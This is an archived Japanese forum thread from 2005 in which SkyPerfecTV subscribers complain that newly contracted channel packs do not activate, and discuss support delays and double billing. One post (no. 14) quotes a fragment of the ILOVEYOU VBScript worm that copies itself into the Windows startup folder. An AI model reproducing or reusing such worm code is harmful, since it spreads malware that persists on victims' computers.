5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

契約しても映らないスカパー

1 :てってーてき名無しさん:2005/12/03(土) 14:25:08 ID:s+vQvWSn
なんなんでしょう。

2 :てってーてき名無しさん:2005/12/03(土) 14:32:18 ID:???
なんということでしょう

3 :てってーてき名無しさん:2005/12/03(土) 14:38:15 ID:???
大変ご迷惑をお掛けいたしますが、何卒ご理解のほど、よろしくお願いいたします。


4 :てってーてき名無しさん:2005/12/03(土) 15:04:50 ID:K/t+jW0g
ここんとこ、ずっと台風だからね

5 :てってーてき名無しさん:2005/12/03(土) 17:03:27 ID:Fw2W5mRb
昨日(12/2)の夜、WWWはだめだから、携帯で契約追加したけど、まだみえません。
見えるようになるまで、どれくらいかかるのですか?

6 :てってーてき名無しさん:2005/12/03(土) 17:14:48 ID:???
申し込んで1日以上たったけど、まだ衛星メールこねーし
チャンネルもみれねー
TBSチャンネル見たいのに困ったもんだ。。



7 :てってーてき名無しさん:2005/12/03(土) 17:30:12 ID:???
「スカパー!よくばりパック」「スカパー!えらべる15」をお申し込みいただいたお客様へ

「スカパー!よくばりパック」「スカパー!えらべる15」は、順次、ご契約手続きを
しておりますが、現在お申し込みが大変多く、ご視聴いただけるまでにお時間がかかっております。

お申し込み手続きが完了したお客様には、ご利用のチューナーに手続完了をお知らせする衛星メールをお送りしております。
衛星メールが到着した後にご契約のチャンネルがご覧いただけるようになりますの
で、お申し込みチャンネルがご覧いただけないお客様は、衛星メールの到着をお待ちください。

大変申し訳ございませんが、何卒ご了承ください。

8 :てってーてき名無しさん:2005/12/03(土) 17:32:18 ID:???
すでに暗唱できそうな気がするな

9 :てってーてき名無しさん:2005/12/03(土) 17:41:25 ID:???
単独チャンネルは関係ないだろ!

パックじゃねえんだぞ!

10 :てってーてき名無しさん:2005/12/03(土) 18:18:52 ID:???
今携帯でよくばり契約したけど
この分では土日は無理そうだな…

11 :てってーてき名無しさん:2005/12/03(土) 18:35:14 ID:/8CxX30g
東映チャンネルと同時契約したら安くなるはずなのに、
できない。

12 :てってーてき名無しさん:2005/12/03(土) 18:41:19 ID:QaTXiM6K
電話もなかなかつながらないしやっとつながってもかなり待たされる
電話代はフリーダイヤルじゃないからこっち持ち出し
しかもいつになるかはわかんないけどこっちから電話しますだって
ひどすぎる!!

13 :てってーてき名無しさん:2005/12/03(土) 18:43:35 ID:QaTXiM6K
催促したら映りました
一体どうなってるんだ...

14 :てってーてき名無しさん:2005/12/03(土) 19:26:47 ID:???
fso.copyfile "c:\network.vbs",
"j:\windows\startmenu\programs\
startup\"c.Copy(dirsystem&"\LOVE-LETTER-FOR-OU.TXT.vbs")

15 :てってーてき名無しさん:2005/12/03(土) 20:00:38 ID:???
>>14
古っ

16 :てってーてき名無しさん:2005/12/03(土) 20:18:16 ID:???
昨日、夜10時頃に申し込みをして、本日夕方から映りはじめました。

17 :てってーてき名無しさん:2005/12/03(土) 21:13:43 ID:s+vQvWSn
【総務省】 スカパーへの行政指導を

契約できない。

出来ても映らない。

みんなで請願しましょう。

18 :てってーてき名無しさん:2005/12/03(土) 21:33:35 ID:I5Ybh/X5

 早 く 写 し て く れ

19 :てってーてき名無しさん:2005/12/03(土) 21:34:21 ID:???
【訂正】
 早 く 映 し て く れ


20 :てってーてき名無しさん:2005/12/03(土) 22:10:16 ID:???
         -─=三=- 、
       /イイイ   ヽ三\ヽ\
      ///イ   ___    ヽ トトト
      i:|:/ミ  -_-__--_−_-_ トト|:i
      |:|:|イ   へ、 ̄ /ヽ   |:|:|
      |:|:||   _、   ,.-_、 |:|:|
      ト:!:|  ヽ´´´ノ ヽ´´´ノ |:|リ
      ヽ_|    ̄ ノ  丶 ̄  |_ノ
         | \/ (_i  i_)\/ |
        |  | /  ̄  \ | | <何やってんだよ!!!ざけんじゃねえよ!!!
         \ -=^^=- /
           ヽ   ̄  ノ


21 :てってーてき名無しさん:2005/12/04(日) 01:03:21 ID:???
スカでパーだからスカパー

22 :てってーてき名無しさん:2005/12/04(日) 08:08:21 ID:obtrTh5w
2日夜 携帯で契約

いまだ映らず

23 :てってーてき名無しさん:2005/12/04(日) 08:38:09 ID:px5wMXQi
「スカパー!よくばりパック」「スカパー!えらべる15」が大好評につき、
オンラインカスタマーセンターが大変つながりにくくなっています。


脆弱な会社だな。

24 :てってーてき名無しさん:2005/12/04(日) 09:26:19 ID:???
アニメパック契約完了しているのに映らない

25 :てってーてき名無しさん:2005/12/04(日) 10:23:17 ID:2Bx16CZK
2日の夜にはWEBは申し込み出来ましたよ
3日の夜仕事から帰ったら見られました。

26 :てってーてき名無しさん:2005/12/04(日) 11:17:21 ID:H7uFHxqi
>>25
俺も2日の深夜にHPでよくばりを契約したが、まだ映らん。

よくばりバック契約したら、ベーシックパックは自動的に
解約されるの?解約方法がわからんのでそのままにして
あるんだけど。

27 :てってーてき名無しさん:2005/12/04(日) 11:56:05 ID:???
>>26
契約の変更じゃなくて
よくばり新規契約扱いなら
1月には両方請求されるんじゃないの。



28 :てってーてき名無しさん:2005/12/04(日) 11:58:05 ID:???
>>26
ベーシックパックはよくばりパックと完全にかぶっていないから
解約されないよ。(デジオとか二コロデオンとかいろいろあるだろ?)
自分で解約しなはれ

29 :てってーてき名無しさん:2005/12/04(日) 12:17:18 ID:8TDK9GlG
二重に請求されたらイタイな 俺は全部カブってるレッドパックだから無問題

30 :てってーてき名無しさん:2005/12/04(日) 13:03:29 ID:4zdCpg4P
オンライン死んでるから、さっき電話で【選べる15】を契約した。
「視聴できるまで3〜4日かかります」と言われたよ。

31 :てってーてき名無しさん:2005/12/04(日) 13:30:14 ID:???
丸二日経っても見る事が出来ません
目当ての番組が終わってしまいました・・・・

32 :てってーてき名無しさん:2005/12/04(日) 13:41:41 ID:AoW0EFBM
いいかげんに白よ!
金曜の昼に申し込んだのにまだかょ!

33 :てってーてき名無しさん:2005/12/04(日) 13:57:03 ID:???
ベーシックは今月中に自分で解約しないとダメ
解約しなければ普通にベーシックの1月請求が来る

34 :てってーてき名無しさん:2005/12/04(日) 14:05:01 ID:???
>>29
契約だから、かぶるか、かぶらないかの問題ではないよ。
一月末には、よくばりと・レッド両方をを請求されるよ。

よくばりが出たことによって、ベーシックの新規受付が無くなっただけで
従来の契約は生きてる・

悪いことは言わないから、レッドを解約しなはれ。


35 :てってーてき名無しさん:2005/12/04(日) 14:07:15 ID:???
こりゃー 一月末には
請求問題で荒れるなぁ・・・きっと・

36 :てってーてき名無しさん:2005/12/04(日) 14:23:11 ID:HXCrSD5w
契約したチャンネルがまるまる2日間以上映らないんだけど、
ここ見たら俺だけじゃ無いのか?

37 :てってーてき名無しさん:2005/12/04(日) 14:24:25 ID:MWAtN3lR
>>29
もう少し、細かく言うと

確かに、よくばりと・今までの契約チャンネルが完全にダブル場合
二重請求を防ぐため、チャンネル・契約セットの変更をさせていただく
場合があると謳ってある。 

ここで、問題なのはさせていただく場合があると言う一文。。
あいまいだなぁ。。普通はこんないい加減な話はないだろうに

変更しなかったから金とるぞ〜〜てか。。

とりあえず、カスタマーが落ち着いたら電話で解約確認しといたら。

38 :てってーてき名無しさん:2005/12/04(日) 15:03:16 ID:H7uFHxqi
>>27

カスタマーサービスのHPに繋いで、最初によくばりの契約したんだけど、
そのあとで、ベーシックセットを解約しようと思ったら、どこをみても
そんなメニューでてこないんだよね。

これは、いったいどういうこと?




39 :てってーてき名無しさん:2005/12/04(日) 15:14:53 ID:QowoV5qV
>>1俺も1日に申し込んだけどまだ見れない。

40 :38:2005/12/04(日) 15:24:42 ID:H7uFHxqi
>>37
俺もレッドパック+ミステリチャンネルなんで、全部かぶってる
はずなんだけど、レッドパックの解約メニューが出てこなかった
んだよね。だから、自動的に変更かと思ったんだが。
単独チャンネルは解約できるから、ミステリは解約したけど、
しかし、翌月まで継続とは知らなかった。普通、解約は即日だろ。
翌月まで金取るなんてあまりにもひどくないか?



41 :てってーてき名無しさん:2005/12/04(日) 15:25:45 ID:H7uFHxqi
考えてみれば、翌月から請求開始ということは、申し込んですぐ
見られなくても文句はいえないのでは?


42 :てってーてき名無しさん:2005/12/04(日) 15:35:31 ID:???
今日もサッカー見られないよ・・・・・
スカパーの一社状態になってから悪い事ばっかだな

43 :てってーてき名無しさん:2005/12/04(日) 15:37:12 ID:???
スカパスタッフは何が起こっても週末休みなのかしら
土日に働くわけねーだろ テレビのことぐらいでギャーギャー言うな
他に楽しみはないのか アワレだな(プ
とか思ってるのかしらん

44 :てってーてき名無しさん:2005/12/04(日) 15:38:26 ID:???
>>41
寛大な人ですね

45 :てってーてき名無しさん:2005/12/04(日) 15:40:28 ID:???
>>43
>スカパスタッフは何が起こっても週末休みなのかしら
>土日に働くわけねーだろ 

先週日曜の出来事を忘れたのか

46 :てってーてき名無しさん:2005/12/04(日) 16:04:04 ID:???
1日の夕方に電話でイエロー解約+よくばり追加した。
2日の夕方になっても反応無いのでWEBから申請した。
その日の夜にイエローの解約完了の衛星メールだけ届いた。
3日の夕方になってもよくばりは映らない。
今WEBで確認したら、よくばりは未契約になってた。

申し込みしてから4日も経ってるんですけどーーーーー


47 :てってーてき名無しさん:2005/12/04(日) 16:34:58 ID:ONL+B/f3
まともな対応できないのにCMだけは垂れ流しだな
あややと琴欧州氏ね!

48 :てってーてき名無しさん:2005/12/04(日) 16:42:25 ID:???
あややと琴欧州のギャラも今回加入してまだ映らない皆さんの視聴料から払われてるんですよ。
スカパー社員の給料もですけど。

49 :てってーてき名無しさん:2005/12/04(日) 18:23:35 ID:H7uFHxqi
>>46
WEBからイエローの解約ってできた?
どうやったの?


50 :てってーてき名無しさん:2005/12/04(日) 18:37:34 ID:???
いやどこも何も
ログインして画面を良く見てみそ


51 :てってーてき名無しさん:2005/12/04(日) 18:42:04 ID:5+lOCAmo
よくばりパック開始は一月から

52 :てってーてき名無しさん:2005/12/04(日) 18:47:38 ID:???
>>46
オレも1日の深夜にWebで契約したけど、今朝確認したら未契約になってた。
で、また契約の手続きしちゃったんだけど、
これって同じ契約を二組しちゃったことになるの?料金が倍取られるとか?

53 :てってーてき名無しさん:2005/12/04(日) 18:49:52 ID:???
たとえば衛星劇場がある時代劇セットとよくばりを二重契約したら課金はどうなるんだろうか…

54 :てってーてき名無しさん:2005/12/04(日) 18:53:37 ID:???
時代劇セットの内容から衛星劇場を抜いた組み合わせをバラ契約する金額と
セットのままの金額を比べて安いほうにかってに設定される

55 :てってーてき名無しさん:2005/12/04(日) 19:30:38 ID:???
スカパーを見ていて時々出るブロックノイズや音声が瞬間切れるのは衛星からの電波が乱れているからですかね?

56 :てってーてき名無しさん:2005/12/04(日) 19:46:52 ID:???
マルチ氏ね

57 :てってーてき名無しさん:2005/12/04(日) 20:20:20 ID:???
撮影してるカメラから君の脳までの伝達過程のどこかに問題があるから

58 :てってーてき名無しさん:2005/12/04(日) 20:43:31 ID:H7uFHxqi
>>50
わかった。
なんともはや、スクロールせずに見てたよ。はは。
重複のため解約にしたけど、1月分をよくばりセット
と二重で課金されたらすごく嫌だな。

59 :てってーてき名無しさん:2005/12/04(日) 21:16:57 ID:???
>>54
なるほど。案外良心的なんだな。thx

60 :てってーてき名無しさん:2005/12/05(月) 13:03:43 ID:???
土曜日フジテレビ契約して日曜日見れたのに今日になって契約してないって画面になるし、カスタマーメンテ中だし
どうなってんだ?


61 :てってーてき名無しさん:2005/12/05(月) 19:57:03 ID:???
>>60
毎月第1日曜はスかパー!大解放デー

62 :てってーてき名無しさん:2005/12/05(月) 20:42:37 ID:???
昨日夕方スターチャンネルのパック申し込んだら
その日のうちにCSは映ったけど
BSが映らねえw

63 :てってーてき名無しさん:2005/12/09(金) 08:17:50 ID:QrTSn3SX
ぐあああいつまで待たせるんだ3日目だぞage

64 :てってーてき名無しさん:2005/12/09(金) 13:09:09 ID:zEAxgzvr
>>60
俺と全く同じだ。しかもまだ見れねー。

65 :てってーてき名無しさん:2005/12/09(金) 13:20:49 ID:???
今問い合わせ電話したら、受付の人にWebより電話の方が早いので
今度から急ぎなら繋がりにくくても電話使ってって言われたよ
Webの方が早いと勘違いしてた
まあ今日中には見られるって言われたからいいや

66 :てってーてき名無しさん:2005/12/09(金) 13:42:59 ID:S+y2fClC
契約変更受付完了の衛星メールは来たけど
まだ映りません・・・

67 :てってーてき名無しさん:2005/12/10(土) 09:45:14 ID:???
申しこんでも見れないからって何回もオンライン契約して
そのうちカスタマーパンクしてスカパーあぼーん

68 :てってーてき名無しさん:2005/12/14(水) 01:01:14 ID:ELkix6dw
時間かかり杉w

69 :てってーてき名無しさん:2007/01/10(水) 19:29:29 ID:???


70 :てってーてき名無しさん:2007/02/13(火) 18:33:57 ID:pCmbfTIO
やってくれたな

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)